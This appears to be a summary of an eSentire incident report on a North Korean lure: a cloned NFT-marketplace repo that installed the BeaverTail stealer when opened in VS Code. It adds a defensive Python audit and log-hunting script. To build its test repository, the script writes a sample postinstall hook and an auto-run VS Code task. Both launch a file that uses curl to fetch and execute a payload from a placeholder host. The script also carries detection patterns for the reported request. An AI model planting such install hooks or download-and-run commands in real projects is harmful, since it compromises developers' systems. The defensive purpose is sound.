Bored BeaverTail Yacht Club – A Lazarus Lure

2024-10-17 eSentire

https://www.esentire.com/blog/bored-beavertail-yacht-club-a-lazarus-lure


eSentire responded to a September 2024 incident in which a developer cloned a malicious NFT marketplace project from GitHub and, by opening it in Visual Studio Code, installed BeaverTail (a JavaScript stealer and loader) posing as an NPM package. The package launched a JavaScript file from the project's .vscode folder, which then issued cURL commands to fetch a Python interpreter and libraries associated with InvisibleFerret, the Python backdoor that typically follows BeaverTail. Endpoint controls blocked the download, so deployment of the backdoor was not confirmed. eSentire's Threat Response Unit (TRU) assessed the TTPs as consistent with the North Korean Contagious Interview campaign, citing overlap with Unit42 reporting, the targeting of developers, cryptocurrency-themed GitHub lures, and the observed p.zi payload name and :1224/pdown request pattern. The case matters because it shows the campaign still abusing ordinary software-development workflows, a cloned repository and a package install, to run code on developer systems before any prompt the developer would recognise, and then staging a follow-on backdoor.
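The mechanics above suggest two checks a defender can run before a cloned project is opened, and after, if it already was. The script below is an added illustration, not eSentire's tooling or anything from the blog: it audits a project tree for code paths that execute without an explicit click (NPM install-time lifecycle hooks, scripts parked inside .vscode, and tasks.json tasks marked to run on folder open), flags JavaScript that shells out to curl and references the reported p.zi and :1224/pdown pattern, and greps proxy log lines for the same pattern. The sample repository and log lines it builds are constructed; the file name bootstrap.js, the task label, the package name and the host example.invalid are placeholders, not indicators from the incident.

```python
"""Audit a cloned project for no-click execution paths and hunt for the
reported request pattern. Hypothetical helper, not eSentire's code."""
import json
import re
import tempfile
from pathlib import Path

# NPM lifecycle hooks that run shell commands during `npm install`
# with no further user interaction.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Request pattern reported for this incident: a p.zi payload fetched
# from a :1224/pdown endpoint. Host names are deliberately not matched.
IOC_RE = re.compile(r":1224/pdown\b|\bp\.zi\b")


def _load_jsonc(path: Path) -> dict:
    """Parse JSON that may carry // line comments and trailing commas,
    as VS Code settings files often do (simplified stripping)."""
    text = re.sub(r"^\s*//.*$", "", path.read_text(errors="ignore"), flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def audit_repo(repo: Path) -> list[str]:
    """Return one finding per mechanism that would run code without a click."""
    findings: list[str] = []

    pkg = repo / "package.json"
    if pkg.is_file():
        scripts = _load_jsonc(pkg).get("scripts", {})
        for hook in LIFECYCLE_HOOKS:
            if hook in scripts:
                findings.append(f"package.json {hook}: {scripts[hook]}")

    vscode = repo / ".vscode"
    if vscode.is_dir():
        # Editor config directories are rarely reviewed; a script there is odd.
        for js in sorted(vscode.rglob("*.js")):
            findings.append(f"script inside .vscode: {js.relative_to(repo)}")
        tasks = vscode / "tasks.json"
        if tasks.is_file():
            for task in _load_jsonc(tasks).get("tasks", []):
                if task.get("runOptions", {}).get("runOn") == "folderOpen":
                    findings.append(
                        f"tasks.json auto-run task {task.get('label')!r}: "
                        f"{task.get('command')}"
                    )

    # Any JavaScript in the tree that shells out to curl and references
    # the reported request pattern is a download-and-run stager candidate.
    for js in sorted(repo.rglob("*.js")):
        body = js.read_text(errors="ignore")
        if re.search(r"\bcurl\b", body) and IOC_RE.search(body):
            findings.append(f"download-and-run stager: {js.relative_to(repo)}")
    return findings


def scan_proxy_log(lines: list[str]) -> list[str]:
    """Return the proxy log lines whose URL matches the reported pattern."""
    return [ln for ln in lines if IOC_RE.search(ln)]


def build_sample_repo(root: Path) -> Path:
    """Write a CONSTRUCTED project tree modelled on the lure described above.
    Package name, file name, task label and host are placeholders."""
    (root / ".vscode").mkdir(parents=True)
    (root / "package.json").write_text(json.dumps({
        "name": "nft-marketplace",
        "scripts": {"postinstall": "node .vscode/bootstrap.js"},
    }))
    (root / ".vscode" / "bootstrap.js").write_text(
        "require('child_process').exec("
        "'curl -o p.zi http://example.invalid:1224/pdown && python p.zi');\n"
    )
    (root / ".vscode" / "tasks.json").write_text(
        '{\n  // auto-run on open\n  "version": "2.0.0",\n'
        '  "tasks": [{"label": "setup", "type": "shell",\n'
        '    "command": "node .vscode/bootstrap.js",\n'
        '    "runOptions": {"runOn": "folderOpen"},}],\n}\n'
    )
    return root


SAMPLE_LOG = [  # constructed proxy lines, not from the incident
    "GET http://example.invalid:1224/pdown 200 dev-laptop-07",
    "GET https://registry.npmjs.org/lodash 200 dev-laptop-07",
]


def run_demo() -> list[str]:
    """Build the constructed repo in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as d:
        return audit_repo(build_sample_repo(Path(d)))


if __name__ == "__main__":
    for f in run_demo():
        print("FINDING:", f)
    for line in scan_proxy_log(SAMPLE_LOG):
        print("IOC:", line)
```

Run it against a freshly cloned project before `npm install` or opening the folder in VS Code; the repository check is the one that would have fired here, since the stager only needed the install hook or the editor to run it. The proxy check is for the case this incident landed in, where the endpoint blocked the payload and the question becomes which other hosts requested the same path.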
